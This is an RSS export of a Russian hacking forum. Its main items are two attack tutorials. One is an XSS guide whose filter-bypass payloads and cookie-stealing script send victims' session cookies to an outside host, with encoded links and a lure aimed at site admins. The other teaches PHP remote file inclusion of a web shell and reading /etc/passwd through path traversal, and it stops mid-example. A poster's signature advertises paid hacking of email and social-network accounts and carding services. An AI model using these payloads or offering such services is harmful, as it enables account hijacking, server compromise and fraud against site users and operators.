<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://rht.apbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Russia Hack Team</title>
		<link>https://rht.apbb.ru/</link>
		<description>Russia Hack Team</description>
		<language>ru-ru</language>
		<lastBuildDate>Wed, 15 Dec 2010 18:39:06 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Секреты vkontakte.ru (Баги , недоработки , ошибки , интересные вещи)</title>
			<link>https://rht.apbb.ru/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;&lt;strong&gt;freeman211[/b[b]freeman211&lt;/strong&gt;&lt;br /&gt;есть разговор!сможешь помочь???&lt;/p&gt;</description>
			<author>mybb@mybb.ru (саша)</author>
			<pubDate>Wed, 15 Dec 2010 18:39:06 +0300</pubDate>
			<guid>https://rht.apbb.ru/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>Xss для новичков</title>
			<link>https://rht.apbb.ru/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;Привет!!!&lt;br /&gt;В этой теме я хочу детально описать Xss от A до Я.&lt;br /&gt;Так что начнём...&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;========================================&lt;br /&gt;### Xss это Css =&amp;gt; Cross Site Scripting&lt;br /&gt;Чтобы не путать с CSS также назвыают XSS &lt;br /&gt;Впервые этот БАГ появился в 1997.&lt;br /&gt;=======================================&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;### &lt;span style=&quot;color: red&quot;&gt;Как используют XSS?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Для начала нам нужно знать что такое Cookie. &lt;br /&gt;Если вы знаете, можете пропустить.&lt;/p&gt;
						&lt;p&gt;Cookie служат для сохранения учетных данных сайта на компьютере поситителя.&lt;br /&gt;Если вы зарегестрировались на сайте под ником&lt;span style=&quot;color: blue&quot;&gt; &#039;blabluble&lt;/span&gt;&#039;, то сайт сохранил у вас на компьютере файл с &lt;span style=&quot;color: blue&quot;&gt;cookies&lt;/span&gt;, где закодированы ваши данные.&lt;br /&gt;А если вы есть админ и у вас есть доступ к сайту, а я - юзер, который украл у вас(админа) cookies, то я могу спокойно зайти на сайт, и сайт меня определяет как &lt;span style=&quot;color: blue&quot;&gt;&#039;admin&#039;&lt;/span&gt; - у меня будут администраторские права.&lt;/p&gt;
						&lt;p&gt;Для смены(подстановки украденных) кук советую использувать прогу &lt;span style=&quot;color: blue&quot;&gt;CookieEdit&lt;/span&gt; для IE или встроенные функции в Опере и Фаерфоксе.&lt;/p&gt;
						&lt;p&gt;========================================&lt;br /&gt;Мы разобрались что такое куки идём дальше...&lt;br /&gt;Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку.&lt;/p&gt;
						&lt;p&gt;### &lt;span style=&quot;color: red&quot;&gt;Что такое XSS-атака?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;XSS&lt;/span&gt; атаки - это атаки не на сам сайт, а на пользователей сайта. &lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;XSS&lt;/span&gt; - это недоработка в фильтре, приложении.&lt;/p&gt;
						&lt;p&gt;Бывают пассивные &lt;span style=&quot;color: blue&quot;&gt;XSS&lt;/span&gt; и активные &lt;span style=&quot;color: blue&quot;&gt;XSS.&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Что такое пассивные XSS?&lt;/p&gt;
						&lt;p&gt;Пассивные - это Xss, которые требуют от жертвы непосредственного участия + есть специфические ограничения и сложности. &lt;br /&gt;Поэтому, пассивные XSS не очень ценятся.&lt;br /&gt;Например, нужно заставить её пройти по ядовитой ссылке, что потребует социальной инженерии, хитрости.&lt;/p&gt;
						&lt;p&gt;Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы - ей достаточно лишь открыть страницу с вашим XSS и ява-код выполнится автоматически. &lt;br /&gt;Благодаря своей автоматизированности - они очень полезны и ценны.&lt;br /&gt;Например, активные хсс существуют в BB-тегах из-за недостаточной фильтрации, когда вы оставляете сообщение на форуме\гостевухе\чате, которое будет всегда активен при каждом обновлении.&lt;/p&gt;
						&lt;p&gt;### Итак, перейду конкретно к тому, как найти на сайте XSS.&lt;/p&gt;
						&lt;p&gt;Как я раньше уже писал что XSS состоит из тегов, они же состоят из &lt;span style=&quot;color: blue&quot;&gt;html, и javascript языка&lt;/span&gt; =).&lt;/p&gt;
						&lt;p&gt;Javascript можно вписывать в html.&lt;br /&gt;Можно кодировать, чтобы обойти фильтры. Но об этом позже.&lt;/p&gt;
						&lt;p&gt;Как узнать, что XSS на даном сайте проходит?&lt;/p&gt;
						&lt;p&gt;Ужасна распрастраннёная узявимость типа: &lt;span style=&quot;color: blue&quot;&gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/span&gt; Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился. &lt;/p&gt;
						&lt;p&gt;Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация): &lt;span style=&quot;color: blue&quot;&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/span&gt; &lt;br /&gt;Вся суть в &amp;quot;&amp;gt; .&lt;br /&gt;Давайте подумаем, что мы делаем, когда вводим в поле &lt;span style=&quot;color: blue&quot;&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/span&gt; , что происходит? &lt;br /&gt;Мы вводим в форму &lt;span style=&quot;color: blue&quot;&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/span&gt; какой-то переменной присваиваеться значение поля. Переменная обрабатывается, &amp;quot;&amp;gt; выполняеться, закрывает &lt;br /&gt;скрипт и выпролняет &lt;span style=&quot;color: blue&quot;&gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/span&gt; &lt;/p&gt;
						&lt;p&gt;Эта XSS самая распостраненая в поисковиках:&lt;br /&gt;Просматриваем все поля сайта и пытаемся вставить &lt;span style=&quot;color: blue&quot;&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/span&gt; &lt;br /&gt;Если вышло сообщение - вы нашли XSS...&lt;/p&gt;
						&lt;p&gt;### А как определить есть фильтр или нет?&lt;/p&gt;
						&lt;p&gt;Просто в любое поле вводим: &#039;&lt;span style=&quot;color: blue&quot;&gt;&#039;;!--&amp;quot;&amp;lt;fuck&amp;gt;=&amp;amp;{()}&lt;/span&gt;&lt;br /&gt;Дальше открываем html страничку и ищем слово &amp;quot;fuck&amp;quot;&lt;br /&gt;и смотри последующие сиволы.. &lt;/p&gt;
						&lt;p&gt;Если &amp;lt;&amp;gt; так и остались то это перваый признак уязвимости - значит фильтр имеет дырку. &lt;br /&gt;Если ,&amp;quot;&#039;\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке. &lt;br /&gt;Затем, если открыв HTML, вы не обнаружили &amp;lt;&amp;gt; то скорее всего дырка в фильтре. &lt;br /&gt;Если открыв HTML вы обнаружили, что &amp;lt;&amp;gt; заменены на другие символы, то это облом - фильтр по крайней &lt;br /&gt;мере функционирует нормально. &lt;br /&gt;Возможно еще ввести в поле для проверки фильтрации вот так: &lt;span style=&quot;color: blue&quot;&gt;&amp;quot;&amp;gt;&amp;lt;&amp;gt;&#039;&amp;quot;`,/\?@%&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Рассмотрим случай если фильтр съедает &amp;lt;&amp;gt; &lt;/p&gt;
						&lt;p&gt;В этом случае существует вероятность дырки. &lt;br /&gt;К примеру, у фильтра условие съедать &lt;span style=&quot;color: blue&quot;&gt;&amp;lt;script&amp;gt;,&amp;lt;&amp;gt;&lt;/span&gt; и . &lt;br /&gt;Тогда пробуем &lt;span style=&quot;color: blue&quot;&gt;&amp;lt;zxcvbnzxc792&amp;gt;&lt;/span&gt; и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.&lt;/p&gt;
						&lt;p&gt;Ещe существует метод вложенного скрипта, к примеру вот так: &lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;&amp;lt;sc&amp;lt;script&amp;gt;ript&amp;gt;alert()&amp;lt;/sc&amp;lt;/script&amp;gt;ript&amp;gt;&lt;/span&gt; &lt;br /&gt;это, если фильтр не оч. сильный и плохо фильтрует. &lt;/p&gt;
						&lt;p&gt;Еще можно попробовать во так: &lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;lt;&amp;lt;script&lt;/span&gt; бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта. &lt;/p&gt;
						&lt;p&gt;Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :&lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;http://******.ru/trye.asp?sessionID=&amp;quot;&amp;gt;&amp;lt;IMG%20SRC=&amp;quot;javascript:alert( ); &lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Фильтр смотрит, что ничего опасного в &lt;span style=&quot;color: blue&quot;&gt;&amp;lt;IMG%20SRC=&amp;quot;javascript:alert&lt;/span&gt;(); нет, закрывает и тем самым &lt;br /&gt;выполняя скрипт. &lt;/p&gt;
						&lt;p&gt;Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код. &lt;/p&gt;
						&lt;p&gt;Все надо пытаться методом проб и ошибок искать...&lt;br /&gt;Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра. &lt;br /&gt;Методом тыков понять, как фильтр работает, есть ли у него недоработки. &lt;br /&gt;Если фильтр плохой, мы всегда можем вставить скрипты.&lt;/p&gt;
						&lt;p&gt;### Активные XSS&lt;/p&gt;
						&lt;p&gt;Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос. &lt;/p&gt;
						&lt;p&gt;Например, теги url,bb,img. &lt;br /&gt;Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.&lt;br /&gt;Этот баг очень часто используется на форуме, в гостевухах...&lt;/p&gt;
						&lt;p&gt;Рассмотрим активные XSS.&lt;/p&gt;
						&lt;p&gt;Предупреждения!!!&lt;br /&gt;еги [fon*t],[&lt;span style=&quot;color: blue&quot;&gt;&lt;/span&gt;im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.&lt;br /&gt;Для использувания этих тегов удалите *. &lt;/p&gt;
						&lt;p&gt;К примеру просмотрим форум на наличие использования тегов &lt;span style=&quot;color: blue&quot;&gt;[fon*t],[im*g],[ur*l]&lt;/span&gt; и попытаться вставить в них скрипт или комбинировать их.:&lt;/p&gt;
						&lt;p&gt;[&lt;span style=&quot;color: lime&quot;&gt;im*g]httр://www.qwewqw.ru/1.jpg[/im*g]&lt;/span&gt; Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании &lt;br /&gt;разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так: &lt;br /&gt;&lt;span style=&quot;color: lime&quot;&gt;[im*g src=httр://www.qwewqw.ru/1.jpg]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Ну так вот к примеру мы добились крестика этим:&lt;br /&gt;&lt;span style=&quot;color: lime&quot;&gt;[im*g]httр://www.qweqw.ru/1.jpg[/im*g]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :&lt;br /&gt;&lt;span style=&quot;color: lime&quot;&gt;[im*g]httр://www.qweqw.ru/1.jpg [/im*g] &lt;/span&gt;&lt;br /&gt;если крестик есть - тогда всё ОК.&lt;/p&gt;
						&lt;p&gt;Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить: &lt;br /&gt;&lt;span style=&quot;color: lime&quot;&gt;[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g]&lt;/span&gt; &lt;br /&gt;проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт. &lt;/p&gt;
						&lt;p&gt;Если фильтр не сдался попробуйте так: &lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;[[im*g]http://www.qweqw.ru/&amp;quot;/dynsrc=&amp;quot;javascript:alert()&amp;quot;/1.jpg[/im*g]&lt;br /&gt;и im*g]http://www.qweqw.ru/&amp;quot;/dynsrc=&amp;quot;javascript:alert()&amp;quot;/1.jpg[/im*g]&lt;br /&gt;и &lt;br /&gt;[im*g]http://www.qwewqw.ru/&amp;quot;/dynsrc=javascript:alert()/1.jpg[/im*g]&lt;/p&gt;
						&lt;p&gt;Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Бывают случаи, когда jpg отключен админом.&lt;/p&gt;
						&lt;p&gt;###Мы всё время делали коды типа:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;&amp;lt;script&amp;gt;alert(&#039;HakNet&#039;)&amp;lt;/script&amp;gt;&lt;br /&gt;javascript:alert(&#039;HakNet&#039;)&lt;br /&gt;javascript:alert(&#039;HakNet&#039;)/1.jpg и так далие..&lt;/span&gt;&lt;br /&gt;Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.&lt;/p&gt;
						&lt;p&gt;Вот скрипт:&lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;&amp;lt;script&amp;gt;&lt;br /&gt;img = new Image();&lt;br /&gt;img.src = &amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;Он уже ворует куки =)&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;###Как его подставить к ссылке с Xss?&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;Да очень легко...&lt;br /&gt;Есть несколко вариантов:&lt;br /&gt;- 1)делаем вот так:&lt;br /&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script&amp;gt;img=new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&amp;quot;+document.cookie;&amp;lt;/script&amp;gt;&lt;br /&gt;где **** сайт с Xss.&lt;/p&gt;
						&lt;p&gt;Вот сам составленый скрипт:&lt;br /&gt;&#039;&amp;gt;&amp;lt;script&amp;gt;img = new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;- 2)Можно ещё делать вот так:&lt;br /&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script src=http://haknet.h16.ru/script/js.js&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;где обращаетса к &lt;a href=&quot;http://haknet.h16.ru/script/js.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://haknet.h16.ru/script/js.js&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;а в js.js есть:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;img=new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&lt;br /&gt;этот способ более надёжен.&lt;/p&gt;
						&lt;p&gt;Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).&lt;br /&gt;Тогда нужно подумать, как его обойти.&lt;br /&gt;Можно просто нечто добавить, нечто поменять, или удалить в скрипте.&lt;br /&gt;Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог. &lt;br /&gt;Есть такой сайт как &lt;a href=&quot;http://ha.ckers.org/xss.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://ha.ckers.org/xss.html&lt;/a&gt; (кодировщик-дэкодировщик).&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Вот пример:&lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;это был закодированный:&lt;/p&gt;
						&lt;p&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script src=http://haknet.h16.ru/script/js.js&amp;gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.&lt;/p&gt;
						&lt;p&gt;Вот такой пример на основе социальной инженерии.&lt;br /&gt;Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так &amp;quot;клевая фича есть на сайте&amp;quot; и так дале в том же духе. &lt;br /&gt;А на нашем сайте будет как вы уже догадались =) вот ето скрипт:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt; &lt;br /&gt;document.location.href=&amp;quot;%68%74%74%70%3A%2F%2F%2A%2 A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&amp;quot; &lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&lt;/span&gt;&lt;br /&gt;а это уже и есть наш Xss в зашифрованом виде.&lt;/p&gt;
						&lt;p&gt;Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк... &lt;br /&gt;Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!&lt;br /&gt;__________________&lt;br /&gt;- делаю ProjectDrops (дроп проекты)&lt;br /&gt;- услуги вбивалы&lt;br /&gt;- провожу взлом аккаунтов онлайн игор, чатов&lt;br /&gt;- провожу взлом любых аккаунтов почтовых служб (mail.ru, yandex.ru, ukr.net...)&lt;br /&gt;- провожу взлом аккаунтов vkontakte.ru&lt;br /&gt;- пишу сайты с потдержкой (php,mysql)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (freeman211)</author>
			<pubDate>Tue, 03 Feb 2009 20:15:40 +0300</pubDate>
			<guid>https://rht.apbb.ru/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>ВСЁ о PHP injection</title>
			<link>https://rht.apbb.ru/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[php injection]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Пхп инъекция довольно распространённый баг, чтобы его Эксплуатировать, не обязательно быть мега гением!&lt;br /&gt;&lt;span style=&quot;color: blue&quot;&gt;ПОЕХАЛИ&lt;/span&gt;&lt;br /&gt;Мы попали на страницу Типа:&lt;/p&gt;
						&lt;p&gt;wwwsite/index.php?url=santaclaus или wwwsite/index.php?url=santaclaus.php или wwwsite/index.php?url=santaclaus.htm итд&lt;br /&gt;&lt;span style=&quot;color: yellow&quot;&gt;в коде есть Include (&amp;quot;$index.php&amp;quot;);&lt;/span&gt;&lt;br /&gt;Теперь пробуем забить вместо santaclaus что-нить другое. Например kutak&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site/index.php?url=kutak&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Результат бывает разный&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;br /&gt;Рассмотрим 4 варианта &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: yellow&quot;&gt;[Первый вариант]&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 6em&quot;&gt;&lt;pre&gt;Warning: main(kutak): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 
Warning: main(): Failed opening &#039;kutak&#039; for inclusion (include_path=&#039;.:/usr/share/php:/usr/share/pear&#039;) in /var/www/site/index.php on line 27&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Тут всё без гемора(main(kutak) никакого расширения не приписывается) идём регаем себе сайт: Можно даже &lt;span style=&quot;color: lime&quot;&gt;на народе(Главное, чтоб shell скрипт не выполнялся, либо убираем права у себя на хосте со скрипта, либо идём на narod.ru И регаем сайт там, там пхп скрипты не выполняются, так как не поддерживаются, если Shell скрипт имеет права на выполнение у вас на хосте, то ничего не выйдет )&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Мы зарегали сайт&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;_www.hacker.narod.ru/shell.php&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Идём обратно и вставляем наш шелл(Инклудим его)&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://.site/index.php?url=http://site/index.php?url=hacker.narod.ru/shell.php&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Если появляется шелл, то всё прошло успешно... НО не факт что код выполнится нормально, иногда админы убирают права на выполнение и наш шелл имеет &lt;span style=&quot;color: lime&quot;&gt;&amp;quot;NOBODY&amp;quot;&lt;/span&gt; Тут ничего не поделаешь, можно ходить по директориям, но ничего изменять, записывать нельзя. Если права на выполнение нормальные, заливаем себе нормальный шелл и не паримся с неудобствами, (А то когда шелл когда шелл блестает на фоне обычного дизайна сайта, нас как-то это бесит)&lt;br /&gt;ТУТ ВСЁ ИДЁМ ДАЛЕЕ&lt;br /&gt;&lt;span style=&quot;color: yellow&quot;&gt;&lt;br /&gt;[Второй вариант]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Мы ввели:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site/index.php?url=kutak&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Нам выдало&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 6em&quot;&gt;&lt;pre&gt;Warning: main(kutak.php): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 
Warning: main(): Failed opening &#039;kutak.php&#039; for inclusion (include_path=&#039;.:/usr/share/php:/usr/share/pear&#039;) in /var/www/site/index.php on line 27&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;МЫ видим, что расширение уже написано(kutak.php)&lt;br /&gt;Давайте рассмотрим если мы пойдём так же как в первом случае&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://.site/index.php?url=http://site/index.php?url=hacker.narod.ru/shell.php&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 6em&quot;&gt;&lt;pre&gt;Warning: main(http://site/index.php?url=hacker.narod.ru/shell.php.php): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 
Warning: main(): Failed opening &#039;http://site/index.php?url=hacker.narod.ru/shell.php.php&#039; for inclusion (include_path=&#039;.:/usr/share/php:/usr/share/pear&#039;) in /var/www/site/index.php on line 27&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;Мы видим (shell.php.php) расширение дописалось и поэтому ничего не вышло&lt;/p&gt;
						&lt;p&gt;А теперь как правильно&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://.site/index.php?url=http://site/index.php?url=http://hacker.narod.ru/shell&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;брали расширение, оно автоматом дописывается, и мы получаем шелл, дальше действуем как хотим.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;&lt;span style=&quot;color: yellow&quot;&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;[Третий вариант вариант]&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;&amp;lt;?
..
Include (&amp;quot;$index.html&amp;quot;);
…
?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Расширение html не даст вам толку, поэтому возможен только локальный инклуд&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 6em&quot;&gt;&lt;pre&gt;Warning: main(kutak.html): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 
Warning: main(): Failed opening &#039;kutak.html&#039; for inclusion (include_path=&#039;.:/usr/share/php:/usr/share/pear&#039;) in /var/www/site/kutak.html on line 27&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Итак, я остановился на локальном инклуде: Млжно смотреть файлы на сервере таким образом&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;www.site/index.php?url=/etc/passwd
www.site/index.php?url=../../../../../../../etc/passwd
или
www.site/index.php?url=../index.php
